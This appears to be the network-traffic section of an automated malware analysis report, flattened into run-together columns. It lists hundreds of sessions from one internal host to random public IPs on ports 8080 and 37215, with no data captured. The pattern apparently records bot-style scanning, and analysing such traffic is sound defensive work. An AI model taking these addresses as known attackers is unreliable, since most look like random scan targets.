                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16778192.168.2.2336014173.12.171.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16779192.168.2.2353976114.9.12.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16780192.168.2.234072025.84.15.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16781192.168.2.2337074203.74.220.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16782192.168.2.233343872.204.136.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16783192.168.2.234371297.99.11.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16784192.168.2.235042665.169.202.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16785192.168.2.2347856118.255.3.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16786192.168.2.2336296142.105.56.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16787192.168.2.2338416197.181.8.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16788192.168.2.2347716120.9.51.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16789192.168.2.2345992221.192.101.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16790192.168.2.2350452155.21.158.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16791192.168.2.234187885.48.56.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16792192.168.2.2359918166.239.11.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16793192.168.2.2351966137.38.83.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16794192.168.2.2355594196.174.24.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16795192.168.2.234006289.42.152.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16796192.168.2.2355672221.153.31.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16797192.168.2.2347728210.160.0.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16798192.168.2.2334504171.175.200.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16799192.168.2.2343770204.38.90.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16800192.168.2.2349450188.192.149.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16801192.168.2.234123258.24.167.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16802192.168.2.2348184129.213.75.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16803192.168.2.235487695.243.240.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16804192.168.2.235022872.114.205.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16805192.168.2.2335396161.157.249.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16806192.168.2.2337924193.160.112.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16807192.168.2.235207681.42.209.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16808192.168.2.2360720167.1.48.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16809192.168.2.2358704146.255.2.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16810192.168.2.2351364183.117.177.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16811192.168.2.233769896.26.62.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16812192.168.2.2356258197.175.126.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16813192.168.2.2338054197.106.213.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16814192.168.2.2340834143.39.172.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16815192.168.2.2354094190.26.174.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16816192.168.2.2350450197.148.128.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16817192.168.2.233486641.96.153.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16818192.168.2.2354802171.57.19.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16819192.168.2.2336952152.55.100.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16820192.168.2.234761218.129.74.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16821192.168.2.235941827.191.178.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16822192.168.2.2341610206.154.134.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16823192.168.2.2351848144.64.24.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16824192.168.2.2348120115.26.234.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16825192.168.2.235196492.134.163.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16826192.168.2.2356762184.71.213.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16827192.168.2.2352526101.189.1.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16828192.168.2.2349672166.178.105.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16829192.168.2.2344668103.122.177.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16830192.168.2.2353072216.254.77.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16831192.168.2.2341812171.21.118.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16832192.168.2.233546066.90.187.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16833192.168.2.2343052133.182.202.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16834192.168.2.2349142114.174.3.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16835192.168.2.234442259.37.83.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16836192.168.2.234157492.78.23.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16837192.168.2.2346444198.135.133.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16838192.168.2.2347866186.15.1.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16839192.168.2.2348094205.142.221.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16840192.168.2.2342174205.20.87.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16841192.168.2.2360642156.121.67.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16842192.168.2.234183231.202.203.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16843192.168.2.233703654.1.22.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16844192.168.2.233848499.55.170.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16845192.168.2.2358452195.245.232.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16846192.168.2.2337970211.91.122.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16847192.168.2.235264646.193.106.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16848192.168.2.2357232110.86.78.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16849192.168.2.235715491.184.120.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16850192.168.2.2343406220.24.136.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16851192.168.2.235437613.87.13.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16852192.168.2.234151284.214.170.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16853192.168.2.2341530190.12.11.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16854192.168.2.234210079.180.25.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16855192.168.2.235120452.90.107.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16856192.168.2.233864840.28.20.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16857192.168.2.2346258187.207.49.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16858192.168.2.23568924.87.118.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16859192.168.2.2349230138.63.3.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16860192.168.2.2340010140.184.19.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16861192.168.2.2353348199.244.183.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16862192.168.2.2333248172.13.48.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16863192.168.2.236078281.18.60.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16864192.168.2.2352998106.163.59.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16865192.168.2.234923462.250.76.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16866192.168.2.2339078155.183.18.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16867192.168.2.235740017.14.35.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16868192.168.2.2338134163.1.8.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16869192.168.2.2349592160.240.27.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16870192.168.2.233954438.145.67.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16871192.168.2.235591440.126.78.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16872192.168.2.235654467.83.216.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16873192.168.2.2333610161.9.253.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16874192.168.2.235550662.244.35.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16875192.168.2.234066014.147.86.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16876192.168.2.2350116118.133.2.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16877192.168.2.236071457.103.49.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16878192.168.2.2352722223.198.245.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16879192.168.2.2357770142.115.68.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16880192.168.2.2350124210.117.58.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16881192.168.2.23602605.119.43.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16882192.168.2.2335532161.154.222.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16883192.168.2.235277847.25.78.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16884192.168.2.2350950157.36.242.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16885192.168.2.2360776172.253.27.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16886192.168.2.2359962163.170.112.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16887192.168.2.2339908154.144.182.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16888192.168.2.2335412142.5.47.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16889192.168.2.2356028110.84.190.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16890192.168.2.234858474.71.207.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16891192.168.2.2356382147.100.156.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16892192.168.2.234890057.94.0.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16893192.168.2.2343596113.70.13.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16894192.168.2.2335246141.200.244.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16895192.168.2.2338170146.140.135.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16896192.168.2.233327240.213.187.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16897192.168.2.234803884.67.158.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16898192.168.2.236007085.126.166.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16899192.168.2.235043279.235.120.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16900192.168.2.2354194154.89.81.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16901192.168.2.2344850177.14.149.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16902192.168.2.234324858.11.221.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16903192.168.2.2353934216.145.174.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16904192.168.2.234509838.13.185.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16905192.168.2.233762458.135.204.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16906192.168.2.2353562100.217.50.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16907192.168.2.2347822175.178.80.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16908192.168.2.23515305.55.111.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16909192.168.2.2345314196.197.54.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16910192.168.2.234260063.140.23.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16911192.168.2.2340102110.125.177.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16912192.168.2.234485412.135.6.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16913192.168.2.234770867.185.201.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16914192.168.2.233504895.118.224.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16915192.168.2.234064041.184.145.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16916192.168.2.2335096116.82.97.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16917192.168.2.2333268206.241.165.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16918192.168.2.23419164.201.247.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16919192.168.2.2355682217.23.164.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16920192.168.2.2340632193.39.133.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16921192.168.2.235173453.48.20.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16922192.168.2.2356414110.155.213.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16923192.168.2.2338604169.107.75.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16924192.168.2.2349300223.91.199.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16925192.168.2.2335664190.203.111.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16926192.168.2.2348310211.246.136.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16927192.168.2.233898613.64.190.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16928192.168.2.235559092.145.103.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16929192.168.2.2354964219.220.228.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16930192.168.2.2344978223.149.56.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16931192.168.2.233677687.101.141.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16932192.168.2.2338410121.2.46.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16933192.168.2.2336580219.87.164.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16934192.168.2.2343134223.147.233.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16935192.168.2.2335058137.22.177.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16936192.168.2.2360060177.184.249.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16937192.168.2.235833248.22.181.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16938192.168.2.2339890203.182.1.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16939192.168.2.235851488.120.242.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16940192.168.2.2354972202.205.126.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16941192.168.2.2334582151.52.85.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16942192.168.2.235421680.221.205.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16943192.168.2.2336782149.13.31.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16944192.168.2.2343116109.102.165.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16945192.168.2.2346750112.85.22.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16946192.168.2.2343814191.98.146.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16947192.168.2.2337864168.109.134.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16948192.168.2.234075258.177.156.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16949192.168.2.233694869.54.67.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16950192.168.2.235862274.41.33.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16951192.168.2.2336770159.224.210.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16952192.168.2.2349656205.149.247.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16953192.168.2.2348504151.255.37.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16954192.168.2.235146837.92.79.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16955192.168.2.2355308201.193.171.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16956192.168.2.2353886119.235.130.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16957192.168.2.235347619.185.201.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16958192.168.2.234537832.236.223.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16959192.168.2.2343024162.216.46.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16960192.168.2.2333224106.181.151.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16961192.168.2.2334332194.25.247.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16962192.168.2.2334986192.134.65.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16963192.168.2.2339392104.3.132.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16964192.168.2.235680445.163.165.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16965192.168.2.234558647.142.91.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16966192.168.2.234607067.172.145.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16967192.168.2.2359030217.104.201.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16968192.168.2.2349040201.230.176.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16969192.168.2.2360676115.86.119.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16970192.168.2.2335186190.29.155.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16971192.168.2.2333498176.22.139.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16972192.168.2.2333434112.39.87.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16973192.168.2.2335592179.247.117.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16974192.168.2.2340654179.86.89.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16975192.168.2.233601051.220.216.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16976192.168.2.234906620.150.107.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16977192.168.2.23405129.17.24.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16978192.168.2.235417872.187.223.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16979192.168.2.2333314209.67.16.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16980192.168.2.2341614199.140.202.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16981192.168.2.234677676.240.65.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16982192.168.2.2342680189.135.31.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16983192.168.2.2344620105.39.189.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16984192.168.2.233951684.125.56.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16985192.168.2.235637658.151.44.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16986192.168.2.233942263.240.229.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16987192.168.2.233558620.90.251.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
